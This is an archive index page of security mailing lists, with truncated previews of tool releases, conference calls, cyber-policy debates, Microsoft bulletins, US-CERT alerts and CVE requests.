Mobile Security Framework (MobSF) is an intelligent, all-in-one open
source mobile application (Android/iOS) automated pen-testing
framework capable of performing static and dynamic analysis. It can be
used for effective and fast security analysis of Android and iOS
Applications and supports both binaries (APK & IPA) and zipped source
code. MobSF can also perform Web API Security testing...
Check out faraday v1.0.18! New CLI mode, Jira support & bug fixes!
Francisco Amato (Apr 07)
Today we are happy to announce that Faraday v1.0.18 is ready!
A short iteration, filled with small powerups - brand new CLI mode
allows you to process reports in batch, new helpers and plugin fixes.
We know that our users rely on a lot of different systems and
solutions and we want to integrate Faraday in that workflow. In that
order we added the ability to easily export data into a JIRA
installation, allowing users to share the findings...
Call for Papers and Posters: CSCESM2016 - Greece
Jackie Blanco (Mar 31)
====================================================
Paper and Poster Submission Deadline: April 13, 2016
====================================================
The Third International Conference on Computer Science, Computer
Engineering, and Social Media (CSCESM2016)
Metropolitan College, Thessaloniki, Greece
May 13-15, 2016
http://www.sdiwc.net/conferences/cscesm2016/
cscesm16 () sdiwc net
The conference welcomes papers on the following (but...
Releasing Mobile Security Framework v0.9
Ajin Abraham (Mar 14)
Hey Folks,
I just released a new version of Mobile Security Framework, an open
source framework capable of performing end to end security testing of
mobile applications.
Mobile Security Framework (MobSF) is an all-in-one open source mobile
application (Android/iOS) automated pen-testing framework capable of
performing static and dynamic analysis. It can be used for effective
and fast security analysis of Android and iOS Applications and...
Approve
Andrew van der Stock (Mar 13)
This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------
ICGCTI2016 Malaysia call for papers and participants
Jackie Blanco (Mar 03)
The Fourth International Conference on Green Computing, Technology and
Innovation (ICGCTI2016)
- Part of The Fifth World Congress on Computing, Engineering and
Technology (WCCET) -
Asia Pacific University of Technology & Innovation (A.P.U.)
Kuala Lumpur, Malaysia | September 6-8, 2016
http://sdiwc.net/conferences/icgcti2016/
icgcti16 () sdiwc net
================================================================
All registered papers will...
Make room for faraday v1.0.17! New #maltego & #arachni plugins & more!
Francisco Amato (Feb 26)
The first of many releases in 2016, Faraday v.1.0.17 (Community, Pro &
Corp) introduces a new Maltego Plugin, support for Mint 17 and Kali
Rolling, and several fixes including installation issues.
Changes:
New Maltego Plugin
Added support for Kali Rolling Edition
Added support for Mint 17
Added user notification when the current Workspace doesn't exist
Added removeBySeverity.py script - as its name describes, it removes
all vulns with...
RVAsec 2016 CFP is now Open!
Sullo (Feb 13)
RVAsec 5 // June 2-3rd, 2016 // Richmond, VA
RVAsec is a Richmond, VA based security convention that brings top
industry speakers to the mid-atlantic region. In its fourth year,
RVAsec 2015 attracted nearly 400 security professionals from across
the country. For 2016, the conference is a two day and dual-track
format, with a mixed focus on technical and management/business
presentations.
All talks must be 55 minutes in length, and submissions...
Arachni Framework v1.4 & WebUI v0.5.10 have been released (Web Application Security Scanner)
Tasos Laskos (Feb 09)
Hey folks,
There's a new version of Arachni, a modular and high-performance Web Application Security Scanner Framework.
The highlights of this release are:
* Massive performance improvements (approx. 5 times faster browser operations,
much reduced RAM and CPU usage).
* Significantly improved coverage via better support for JS effects and event delegation tracking.
* Brand new REST API for easy integration.
* Native support for MS...
Daily Dave — This technical discussion list covers vulnerability research, exploit development, and security events/gossip. It was started by ImmunitySec founder Dave Aitel and many security luminaries participate. Many posts simply advertise Immunity products, but you can't really fault Dave for being self-promotional on a list named DailyDave.
The Correct Amount
dave aitel (Aug 02)
Last week I did the technical review of one of our deliverables. Super
secure website, run by smart people. They'd limited their exposure to
one PHP file. But a good security services company provides strategic
advice, along with individual tactical recommendations. In this case,
the consultant found two critical vulnerabilities in just that one
lonely PHP file. Our strategic recommendation is always this: Use as
much PHP on your website as...
Re: Clique - a stillborn project
Dan Guido (Aug 01)
Sorry to revive a dead thread, but I think this general idea of a
re-encrypting mailing list has been implemented:
https://bitbucket.org/awruef/listcrypt/src
Enjoy!
-Dan
Re: Dailydave Digest, Vol 56, Issue 10
Dave Aitel (Jul 31)
In my head I equate using computer and network operations (CNO) inside an
organization to enable information operations (IO) to getting exploitation
primitives and enabling a "Weird Machine
<http://www.slideshare.net/scovetta/fundamentals-of-exploitationrevisited>".
IO has a long history, but it's a completely different thing once CNE gets
involved. You get a feedback loop. It's like having a debugger, versus
blindly...
Re: "Clickbait policy-making"
Konrads Smelkovs (Jul 31)
[..]
That's because cyber is much more about infowar than death and
destruction as with NBC. And Daily Mail is an amplifier and outlet of
propaganda regardless of whoever served it, so studying it and citing
it as an example of infowar penultimate stage (the ultimate being
change in someone's mindset) is legitimate.
Re: hacking ideology
J.M. Porup (Jul 31)
Isn't "hacking ideology" precisely the sort of speech the First
Amendment was designed to protect?
jmp
Re: "Clickbait policy-making"
Mara Tam (Jul 29)
Dave’s not wrong about this. Cyber policy suffers horribly from the fact that it is disproportionately informed by
popular press (i.e. clickbait).
The American Academy of Arts and Sciences recently published a collection titled ‘Governance of Dual-Use Technologies :
Theory and Practice’.[1] This collection covers nuclear technologies, biological technologies, and IT / ‘cyber
weapons'. If you read all three sections, it becomes...
Re: Dailydave Digest, Vol 56, Issue 10
Paul Erling (Jul 29)
I could agree that the damage cyberwar does is mostly to ideology, but then what is the difference between cyberwar and
propaganda or even marketing? Isn't it just the fact that you have retrieved some difficult to obtain evidence? Does
that make the propaganda/marketing more believable and so effective?
- Paul
-----Original Message-----
From: dailydave-bounces () lists immunityinc com [mailto:dailydave-bounces () lists immunityinc...
Re: "Nitro Zeus" whatever whatever.
Ejovi Nuwere (Jul 29)
This article in the New Yorker seems to align well with your explanation of cyberwar as a systemic disruption of
ideology.
http://www.newyorker.com/news/news-desk/the-real-paranoia-inducing-purpose-of-russian-hacks
Sent from my iPhone
SAINTCON Security Conference
Troy Jessup (Jul 29)
SAINTCON 2016
SAINTCON is the Intermountain-West premiere Cybersecurity conference held in Provo, Utah. This conference is
dedicated to all things security and focuses on security discussions and trainings. If you live or work in the west,
this is your security con!
https://www.saintcon.org
"Nitro Zeus" whatever whatever.
dave aitel (Jul 28)
<nitrozeus>
https://www.youtube.com/watch?v=GiV6am2lNTQ. You'll notice in this
Usenix talk from 2012 I inadvertently blow Nitro Zeus, which came out in
that ZeroDays movie recently. I honestly don't write my talks all by
myself, but you'll notice "we" call out Wikileaks as being a cyber
weapon as opposed to everyone else's seeming fascination with
HackingTeam or whatever the boogieman of the day is.
People...
"Clickbait policy-making"
dave aitel (Jul 28)
https://na-production.s3.amazonaws.com/documents/Bugs-in-the-System-Final.pdf
Look, I'm sure these (Andi Wilson, Ross Schulman, Kevin Bankston, Trey
Herr) are all good people:<image about authors went here>
But I want to point out that you cannot make good policy recommendations
based on clickbait news articles you've happened to have read over the
years on a subject that is under a ton of covert protection, especially
when none...
A Peer Review of the Latest Bellovin Paper on Cyber Weapons
Dave Aitel (Jul 18)
http://papers.ssrn.com/sol3/papers.cfm?abstract_id=2809463
Limiting the Undesired Impact of Cyber Weapons: Technical Requirements and
Policy Implications
Steven M. Bellovin, Susan Landau, and Herbert S. Lin
*Acknowledgements: We are grateful for comments from Thomas Berson, Joseph
Nye, and Michael Sulemeyer, which improved the paper. *
In case you're curious: This paper went off the rails in my opinion in a
couple areas. The first is that...
Re: Clique - a stillborn project
future (Jul 18)
Another encrypted mailing list is schleuder.
It works. http://schleuder2.nadir.org/
If you want to have a serverless encrypted mailinglist Bitmessage works
too.
https://www.bitmessage.org/wiki/Main_Page
Some people don't like the interface. Someone I know reads Bitmessages
on his email client.
Find a list of pros and cons here:
http://7ywdkxkpi7kk55by.onion/trac/wiki/PromisingProjects/BitMessage
another contra: it lacks the...
New Deadline August 15: International Conference on Computing, Networking and Communication (ICNC 2017) - Silicon Valley, USA
Jaime Lloret Mauri (Jul 18)
CALL FOR PAPERS
ICNC 2017
2017 International Conference on Computing, Networking and Communication
Silicon Valley, USA
January 26-29, 2017
http://www.conf-icnc.org/2017
New Deadline August 15
The 2017 International Conference on Computing, Networking and Communication (ICNC) is a premier conference in the
computer and communication fields, which is to be held in Silicon Valley, California during January 26-29, 2017. The
conference covers all...
Re: "I hunt Sys-Admins"
Dave Aitel (Jul 13)
Just want to chime in with this bit from politico this morning:
http://www.politico.com/tipsheets/morning-cybersecurity
*DEFINING DIGITAL ACTS OF WAR* *— *Rep. Will Hurd fears ambiguity on
international norms for acts of war in cyberspace could fuel escalation and
deeper economic losses for the United States. So his House Oversight
Information Technology Subcommittee is *holding*
<...
PaulDotCom — General discussion of security news, research, vulnerabilities, and the PaulDotCom Security Weekly podcast.
Re: [Security Weekly] cheap hosting
Robin Wood (Sep 23)
Resurrecting an old thread but they now have an affiliate program and I can
issue my own codes so:
20% off all servers AqUVYbUXag
50% off all big dog (whatever that is) 7E9YRUzEZy
After a month with them, their tech support is OK but not great, the server
has stayed up and not had any problems.
Robin
Re: [Security Weekly] projecting in a bight space
Jeremy Pommerening (Aug 28)
I would look for a projector with at least 6000 ANSI Lumens or better. A darker screen (grey) may also help.
Jeremy Pommerening
________________________________
From: Robin Wood <robin () digi ninja>
To: Security Weekly Mailing List <pauldotcom () mail securityweekly com>
Sent: Sunday, August 3, 2014 3:42 AM
Subject: [Security Weekly] projecting in a bight space
I've been looking at the venue for next year's...
[Security Weekly] Two Firefox security bugs related to HTTPS
ffbugishere (Aug 17)
Hello world!
We need votes for security bugs!
Adding "Security Exception" for self-signed HTTPS sites cannot be done
permanently
https://bugzilla.mozilla.org/show_bug.cgi?id=1050100
Firefox 31 doesn't support the industry recommended best HTTPS
ciphers
https://bugzilla.mozilla.org/show_bug.cgi?id=1051210
Other browsers should have the same bugs fixed..
p.s.: We are not related to this group, but we think they are worth a
penny...
Re: [Security Weekly] Java and Flash decompilers
Will Metcalf (Aug 05)
JPEXS is very nice for flash IMHO.
http://www.free-decompiler.com/flash/
Regards,
Will
Re: [Security Weekly] Java and Flash decompilers
Bradley McMahon (Aug 05)
I've used flare before to pull apart a flash site for a client.
http://www.nowrap.de/flare.html
-Brad
Re: [Security Weekly] SecurityCenter alternative
Steven McGrath (Aug 04)
SC certainly isn’t cheap (as a former SC customer that moved over to Tenable I can attest to that) however I can point
out that the data aggregation, trending, and custom reporting were huge wins in my book. I guess it's a time/money
trade-off. How much time do you want to spend either cobbling together a tool or manually aggregating the data when
there is another tool already out there that can do it out of the box.
I can speak in more...
Re: [Security Weekly] Java and Flash decompilers
S. White (Aug 04)
A few I've used in the past:
JAD - http://varaneckas.com/jad/ , http://en.wikipedia.org/wiki/JAD_(JAva_Decompiler)
HP SWFscan
Adobe SWF investigator http://labs.adobe.com/technologies/swfinvestigator/
________________________________
From: Robin Wood <robin () digi ninja>
To: Security Weekly Mailing List <pauldotcom () mail securityweekly com>
Sent: Monday, August 4, 2014 5:54 AM
Subject: [Security Weekly] Java and...
[Security Weekly] DoFler @ BSidesLV
Steven McGrath (Aug 04)
This will be the 3rd year that DoFler (the Dashboard of Fail) will be at BSidesLV. This year I wrote a new spiffy
interface for maximum trolling. Let’s be honest now, everyone loves to surf for various forms of horrible on the
internet at cons :D. Also added this year is a little vulnerability analysis (using Tenable’s PVS). Every year I try
to improve it a bit based on everyone’s input, and am always welcome to more feedback.
DB...
Re: [Security Weekly] cheap hosting
Robin Wood (Aug 04)
Already sorted but thanks for the info.
Re: [Security Weekly] Java and Flash decompilers
Nathan Sweaney (Aug 04)
Here are a few others I've used with varying success in the past:
SWFInvestigator - http://labs.adobe.com/technologies/swfinvestigator/
SWFScan - from Rafal Los at HP, though the link has been deleted. (Careful,
I've seen trojaned copies online.)
Re: [Security Weekly] SecurityCenter alternative
Paul Asadoorian (Aug 04)
Thanks all for the informative discussion!
I know, I'm jumping in late, some closing thoughts on the subject:
- SecurityCenter has the unique advantage of consolidating plugin
updates, meaning you could have hundreds of Nessus scanners deployed in
your organization, and the scanners get the plugin feed from your
SecurityCenter system. This removes the requirement of Internet access
(From the scanners), and greatly eases the administration...
Re: [Security Weekly] SecurityCenter alternative
k41zen (Aug 04)
Thanks for all of your help.
We are in discussions with our Tenable contact about solutions for this issue. They’ve helped me out by enabling me to
move forward to at least deploy this into a Pre-Production environment but the costs of SC are a massive stumbling
block; hence my question about something else. Appreciate we have a big Nessus fan base here of which I am a member
too, but just wondered what could be wrapped around it.
I’ll...
Re: [Security Weekly] SecurityCenter alternative
Adrien de Beaupre (Aug 04)
Hi,
I have also written a series of scripts to collect data from tools such as
nmap and nessus to import into MySQL called OSSAMS:
http://www.ossams.com/wp-content/uploads/2011/10/ossams-parser-SecTor-2011.zip
That leaves report writing as a series of SQL queries.
I also have a series of scripts to kick off scans, as well as a command
line XML-RPC nessus client in python if anyone is interested.
Cheers,
Adrien
Re: [Security Weekly] cheap hosting
sec list (Aug 04)
Hey Robin,
If you're still looking, might want to try out getclouder.com - they
spin up Linux containers in 5 seconds and use distributed storage, which
is pretty awesome. It's still in beta, so they offer 3 months free
service, but it has been pretty stable so far from my experience.
[Security Weekly] Java and Flash decompilers
Robin Wood (Aug 04)
Hi
I'm trying to put together a list of tools for decompiling Flash and Java
apps. From asking on another list I already have:
Java
JD-GUI
Java Decompiler http://jd.benow.ca/jd-gui/downloads/jd-gui-0.3.6.windows.zip.
Java snoop https://code.google.com/p/javasnoop/
Flash
Trillix
Flashbang https://github.com/cure53/Flashbang
Has anyone here got any others they can suggest?
Ideally I'm looking for free stuff but cheap commercial...
Honeypots — Discussions about tracking attackers by setting up decoy honeypots or entire honeynet networks.
Honeypot malware archives
Matteo Cantoni (Feb 14)
Hello everyone,
I would like to share with you, for educational purposes and without any
commercial purpose, data collected by my homemade honeypot.
Nothing new, nothing shocking, nothing sensational... but I think it can
be of interest to newcomers to the world of analysis of malware,
botnets, etc... maybe for a thesis.
The files collected are divided into zip archives, in alphabetical
order, with password (which must be requested via email). Some...
Microsoft Sec Notification — Beware that MS often uses these security bulletins as marketing propaganda to downplay serious vulnerabilities in their products—note how most have a prominent and often-misleading "mitigating factors" section.
Microsoft Security Bulletin Minor Revisions
Microsoft (Jul 29)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: July 29, 2016
********************************************************************
Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.
Please see the appropriate bulletin for more details.
* MS16-JUL
Bulletin Information:
=====================
MS16-JUL...
Microsoft Security Bulletin Minor Revisions
Microsoft (Jul 26)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: July 26, 2016
********************************************************************
Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.
Please see the appropriate bulletin for more details.
* MS16-058
Bulletin Information:
=====================
MS16-058...
Microsoft Security Bulletin Minor Revisions
Microsoft (Jul 18)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: July 18, 2016
********************************************************************
Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.
Please see the appropriate bulletin for more details.
* MS16-092
* MS16-094
Bulletin Information:
=====================...
Microsoft Security Bulletin Minor Revisions
Microsoft (Jul 13)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: July 13, 2016
********************************************************************
Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.
Please see the appropriate bulletin for more details.
* MS16-035
* MS16-077
Bulletin Information:
=====================...
Microsoft Security Bulletin Summary for July 2016
Microsoft (Jul 12)
********************************************************************
Microsoft Security Bulletin Summary for July 2016
Issued: July 12, 2016
********************************************************************
This bulletin summary lists security bulletins released for
July 2016.
The full version of the Microsoft Security Bulletin Summary for
July 2016 can be found at
<https://technet.microsoft.com/library/security/ms16-jul>.
Critical...
Microsoft Security Bulletin Summary for July 2016
Microsoft (Jul 12)
********************************************************************
Microsoft Security Bulletin Summary for July 2016
Issued: July 12, 2016
********************************************************************
This bulletin summary lists security bulletins released for
July 2016.
The full version of the Microsoft Security Bulletin Summary for
July 2016 can be found at
.
Critical Security Bulletins
============================
MS16-084...
Microsoft Security Bulletin Minor Revisions
Microsoft (Jun 22)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: June 22, 2016
********************************************************************
Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.
Please see the appropriate bulletin for more details.
* MS16-063
* MS16-077
* MS16-JUN
* MS15-OCT
Bulletin Information:...
Microsoft Security Bulletin Summary for June 2016
Microsoft (Jun 16)
********************************************************************
Microsoft Security Bulletin Summary for June 2016
Issued: June 16, 2016
********************************************************************
This is a notification of an out-of-band security bulletin that was
added to the June Security Bulletin Summary on June 16, 2016.
The full version of the Microsoft Security Bulletin Summary for
June 2016 can be found at
<...
Microsoft Security Bulletin Minor Revisions
Microsoft (Jun 16)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: June 15, 2016
********************************************************************
Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.
Please see the appropriate bulletin for more details.
* MS16-074
* MS16-JUN
Bulletin Information:
=====================...
Microsoft Security Bulletin Summary for June 2016
Microsoft (Jun 14)
********************************************************************
Microsoft Security Bulletin Summary for June 2016
Issued: June 14, 2016
********************************************************************
This bulletin summary lists security bulletins released for
June 2016.
The full version of the Microsoft Security Bulletin Summary for
June 2016 can be found at
<https://technet.microsoft.com/library/security/ms16-jun>.
Critical...
Microsoft Security Bulletin Releases
Microsoft (Jun 14)
********************************************************************
Title: Microsoft Security Bulletin Releases
Issued: June 14, 2016
********************************************************************
Summary
=======
The following bulletins have undergone a major revision increment.
* MS16-039 - Critical
* MS16-APR
Bulletin Information:
=====================
MS16-039
- Title: Security Update for Microsoft Graphics Component...
Microsoft Security Bulletin Minor Revisions
Microsoft (May 25)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 25, 2016
********************************************************************
Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.
Please see the appropriate bulletin for more details.
* MS15-JUL
* MS16-MAY
* MS15-126 - Critical
* MS15-134 -...
Microsoft Security Bulletin Minor Revisions
Microsoft (May 18)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 18, 2016
********************************************************************
Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.
Please see the appropriate bulletin for more details.
* MS16-035 - Important
Bulletin Information:
=====================...
Microsoft Security Advisory Notification
Microsoft (May 18)
********************************************************************
Title: Microsoft Security Advisory Notification
Issued: May 18, 2016
********************************************************************
Security Advisories Updated or Released Today
==============================================
* Microsoft Security Advisory 2880823
- Title: Deprecation of SHA-1 Hashing Algorithm for Microsoft Root
Certificate Program
-...
Microsoft Security Bulletin Minor Revisions
Microsoft (May 13)
********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 13, 2016
********************************************************************
Summary
=======
The following bulletins and/or bulletin summaries have undergone a
minor revision increment.
Please see the appropriate bulletin for more details.
* MS16-MAY
* MS16-067 - Important
Bulletin Information:...
Funsec — While most security lists ban off-topic discussion, Funsec is a haven for free community discussion and enjoyment of the lighter, more humorous side of the security community.
Verizon: 1.5M of Contact Records Stolen, Now on Sale
Jeffrey Walton (Mar 26)
http://www.mobipicker.com/verizon-1-5m-contact-records-stolen-now-sale/:
A business to business telecommunication giant,
Verizon Enterprise Solutions, a Basking Ridge,
New Jersey-based company, has been the latest
victim of a cyber crime that stole 1.5 million contact
records of the customers of Verizon...
I don't quite understand this double talk. Could someone explain to me:
A spokesperson from Verizon said that...
Statement on Lavabit Citation in Apple Case
Jeffrey Walton (Mar 16)
(From John Young on another list):
http://www.facebook.com/KingLadar/posts/10156714933135038
As many of you already know, the government cited the Lavabit case in
a footnote. The problem is their description insinuates a precedent
that was never created. Obviously I was somewhat disturbed by their
misrepresentation. So I decided to draft a statement. And keep in
mind, these are the same people who say "trust us." Click continue to
read...
The NSA's back door has given every US secret to our enemies
Jeffrey Walton (Feb 29)
http://www.businessinsider.com/john-mcafee-nsa-back-door-gives-every-us-secret-to-enemies-2016-2
Deng Xiaoping, in 1979 - his second year as supreme leader of China -
perceived a fundamental truth that has yet to be fully grasped by most
Western leaders: Software, if properly weaponized, could be far more
destructive than any nuclear arsenal.
Under Deng’s leadership, China began one of the most ambitious and
sophisticated meta- software...
Can Spies Break Apple Crypto?
Jeffrey Walton (Feb 27)
Here's an interesting exchange between Cryptome and Michael Froomkin,
Law Professor at University of Miami, on the All Writs Act
(http://cryptome.org/2016/02/can-spies-break-apple-crypto.htm):
-----
A. Michael Froomkin:
The factual posture in the key Supreme Court precedent, New York
Telephone, involved a situation where only the subject of the order
was capable of providing the assistance at issue. This is the basis
for Apple's...
The FBI's iPhone Problem: Tactical vs. Strategic Thinking
Jeffrey Walton (Feb 23)
http://www.technewsworld.com/story/83130.html
I'm an ex-sheriff, and I've been in and out of security jobs for much
of my life, so I've got some familiarity with the issues underlying
the drama between the FBI and Apple. FBI officials -- and likely those
in every other three-letter agency and their counterparts all over the
world -- would like an easier way to do their jobs. Wouldn't we all?
If they could put cameras in...
Wanted: Cryptography Products for Worldwide Survey
Jeffrey Walton (Jan 01)
(http://www.schneier.com/crypto-gram/archives/2015/1215.html):
In 1999, Lance Hoffman, David Balenson, and others published a survey
of non-US cryptographic products. The point of the survey was to
illustrate that there was a robust international market in these
products, and that US-only export restrictions on strong encryption
did nothing to prevent its adoption and everything to disadvantage US
corporations. This was an important contribution...
CERT Advisories — The Computer Emergency Response Team has been responding to security incidents and sharing vulnerability information since the Morris Worm hit in 1986. This archive combines their technical security alerts, tips, and current activity lists.
ACSC Releases Risk Mitigation Strategies Against Malicious Email
US-CERT (Aug 01)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
ACSC Releases Risk Mitigation Strategies Against Malicious Email [
https://www.us-cert.gov/ncas/current-activity/2016/08/01/ACSC-Releases-Risk-Mitigation-Strategies-Against-Malicious-Email
] 08/01/2016 05:13 PM EDT
Original release date: August 01, 2016
The Australian Cyber Security Centre (ACSC [ http://asd.gov.au/infosec/acsc.htm ]) has published guidance to...
DHS Announces Cyber Incident Reporting Information
US-CERT (Jul 29)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
DHS Announces Cyber Incident Reporting Information [
https://www.us-cert.gov/ncas/current-activity/2016/07/29/DHS-Announces-Cyber-Incident-Reporting-Information ]
07/29/2016 09:22 PM EDT
Original release date: July 29, 2016
The United States Department of Homeland Security (DHS) has released guidelines and points of contact for reporting
cyber incidents [...
Google Releases Security Update for Chrome
US-CERT (Jul 21)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
Google Releases Security Update for Chrome [
https://www.us-cert.gov/ncas/current-activity/2016/07/21/Google-Releases-Security-Update-Chrome ] 07/21/2016 01:27 PM
EDT
Original release date: July 21, 2016
Google has released Chrome version 52.0.2743.82 to address multiple vulnerabilities for Windows, Mac, and Linux.
Exploitation of some of these...
Cisco Releases Security Update
US-CERT (Jul 20)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
Cisco Releases Security Update [
https://www.us-cert.gov/ncas/current-activity/2016/07/20/Cisco-Releases-Security-Update ] 07/20/2016 12:29 PM EDT
Original release date: July 20, 2016
Cisco has released a security update to address a vulnerability in its Unified Computing System (UCS) Performance
Manager. Exploitation of this vulnerability could allow an...
Oracle Releases Security Bulletin
US-CERT (Jul 20)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
Oracle Releases Security Bulletin [
https://www.us-cert.gov/ncas/current-activity/2016/07/19/Oracle-Releases-Security-Bulletin ] 07/19/2016 06:07 PM EDT
Original release date: July 19, 2016
Oracle has released its Critical Patch Update for July 2016 to address 276 vulnerabilities across multiple products.
Exploitation of some of these vulnerabilities may allow...
Drupal Releases Security Advisory
US-CERT (Jul 18)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
Drupal Releases Security Advisory [
https://www.us-cert.gov/ncas/current-activity/2016/07/18/Drupal-Releases-Security-Advisory ] 07/18/2016 05:23 PM EDT
Original release date: July 18, 2016
Drupal has released an advisory to address a vulnerability in Drupal core 8.x versions prior to 8.1.7. Exploitation of
this vulnerability could allow a remote attacker to...
Apple Releases Multiple Security Updates
US-CERT (Jul 18)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
Apple Releases Multiple Security Updates [
https://www.us-cert.gov/ncas/current-activity/2016/07/18/Apple-Releases-Multiple-Security-Updates ] 07/18/2016 05:13 PM
EDT
Original release date: July 18, 2016
Apple has released security updates for iTunes, Safari, tvOS, watchOS, iOS, and OS X El Capitan. Exploitation of some
of these vulnerabilities may allow a...
Cisco Releases Security Updates
US-CERT (Jul 14)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
Cisco Releases Security Updates [
https://www.us-cert.gov/ncas/current-activity/2016/07/14/Cisco-Releases-Security-Updates ] 07/14/2016 09:09 AM EDT
Original release date: July 14, 2016
Cisco has released security updates to address vulnerabilities in two products. Exploitation of one of these
vulnerabilities could allow an unauthenticated remote attacker to...
Microsoft Releases Security Updates
US-CERT (Jul 12)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
Microsoft Releases Security Updates [
https://www.us-cert.gov/ncas/current-activity/2016/07/12/Microsoft-Releases-Security-Updates ] 07/12/2016 07:06 PM EDT
Original release date: July 12, 2016
Microsoft has released 11 updates to address vulnerabilities in Microsoft software. Exploitation of one of these
vulnerabilities could allow a remote attacker to take...
Adobe Releases Security Updates
US-CERT (Jul 12)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
Adobe Releases Security Updates [
https://www.us-cert.gov/ncas/current-activity/2016/07/12/Adobe-Releases-Security-Updates ] 07/12/2016 12:55 PM EDT
Original release date: July 12, 2016
Adobe has released security updates to address vulnerabilities in Acrobat, Flash Player, Reader, and XMP Toolkit for
Java. Exploitation of some of these vulnerabilities may...
TA16-091A: Ransomware and Recent Variants
US-CERT (Jul 11)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
TA16-091A: Ransomware and Recent Variants [ https://www.us-cert.gov/ncas/alerts/TA16-091A ] 03/31/2016 06:00 PM EDT
Original release date: March 31, 2016 | Last revised: July 11, 2016
Systems Affected
Networked Systems
Overview
In early 2016, destructive ransomware variants such as Locky and Samas were observed infecting computers belonging to
individuals...
TA16-187A: Symantec and Norton Security Products Contain Critical Vulnerabilities
US-CERT (Jul 05)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
TA16-187A: Symantec and Norton Security Products Contain Critical Vulnerabilities [
https://www.us-cert.gov/ncas/alerts/TA16-187A ] 07/05/2016 10:50 AM EDT
Original release date: July 05, 2016
Systems Affected
All Symantec and Norton branded antivirus products
Overview
Symantec and Norton branded antivirus products contain multiple vulnerabilities. Some of...
Cisco Releases Security Updates
US-CERT (Jun 30)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
Cisco Releases Security Updates [
https://www.us-cert.gov/ncas/current-activity/2016/06/30/Cisco-Releases-Security-Updates ] 06/30/2016 07:35 AM EDT
Original release date: June 30, 2016
Cisco has released security updates to address vulnerabilities in several products. Exploitation of some of these
vulnerabilities could allow an unauthenticated remote attacker...
Symantec Releases Security Updates
US-CERT (Jun 29)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
Symantec Releases Security Updates [
https://www.us-cert.gov/ncas/current-activity/2016/06/29/Symantec-Releases-Security-Updates ] 06/29/2016 11:40 AM EDT
Original release date: June 29, 2016
Symantec has released security updates to address vulnerabilities in multiple products. Exploitation of some of these
vulnerabilities may allow an attacker to take...
IRS Announces Safeguards to Protect Taxpayer Information
US-CERT (Jun 24)
U.S. Department of Homeland Security US-CERT
National Cyber Awareness System:
IRS Announces Safeguards to Protect Taxpayer Information [
https://www.us-cert.gov/ncas/current-activity/2016/06/24/IRS-Announces-Safeguards-Protect-Taxpayer-Information ]
06/24/2016 07:02 PM EDT
Original release date: June 24, 2016
The Internal Revenue Service (IRS) has issued two news releases addressing new safeguards to protect taxpayers and
strengthen...
Open Source Security — Discussion of security flaws, concepts, and practices in the Open Source community.
Multiple vulnerabilities affecting seven WordPress (XSS, CSRF, SQLi)
Summer of Pwnage (Aug 02)
Please see attached advisories for more information. These issues were
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community
project. Its goal is to contribute to the security of popular, widely
used OSS projects in a fun and educational way.
------------------------------------------------------------------------
Cross-Site Request Forgery in ALO EasyMail Newsletter WordPress Plugin...
CVE Request: Denial-of-Service / Unexploitable Memory Corruption in mmap() on OpenBSD
Jesse Hertz (Aug 02)
Hi All,
As part of NCC Group’s Project Triforce, a generic syscall fuzzing effort by
myself and Tim Newsham, a new vulnerability was discovered in the
OpenBSD kernel. It has been fixed now. Please assign a CVE for this issue.
/*
* mmap_dup_panic.c
* Demonstrate a panic through the mmap system call.
*
* gcc -g mmap_dup_panic.c -o mmap_dup_panic
*/
#ifdef BUG_WRITEUP //---------------------------------------------------
Any user can...
Re: Ruby:HTTP Header injection in 'net/http'
Marcus Meissner (Aug 02)
Hi,
Was this ever accepted by the Ruby upstream team as a valid bug?
You seem to quote some bugtracker, where is it and is the bug public there?
Ciao, Marcus
CVE Request ImageMagick buffer overflow
Ibrahim el-sayed (Aug 02)
Hi CVE assignment team,
I would like to request a CVE for a buffer overflow that was found in
ImageMagick. You can find the fix in the following commit:
https://github.com/ImageMagick/ImageMagick/commit/76401e172ea3a55182be2b8e2aca4d07270f6da6
Cheers,
Ibrahim M. El-Sayed
Security Engineer
Website: https://www.ibrahim-elsayed.com
@ibrahim_mosaad
glibc: Per-thread memory leak in __res_vinit with IPv6 nameservers (CVE-2016-5417)
Florian Weimer (Aug 02)
We have assigned CVE-2016-5417 to a memory leak in glibc. It was
introduced in glibc 2.22, with commit
2212c1420c92a33b0e0bd9a34938c9814a56c0f7 (which also caused other
regressions, which is why we backed it out in Fedora).
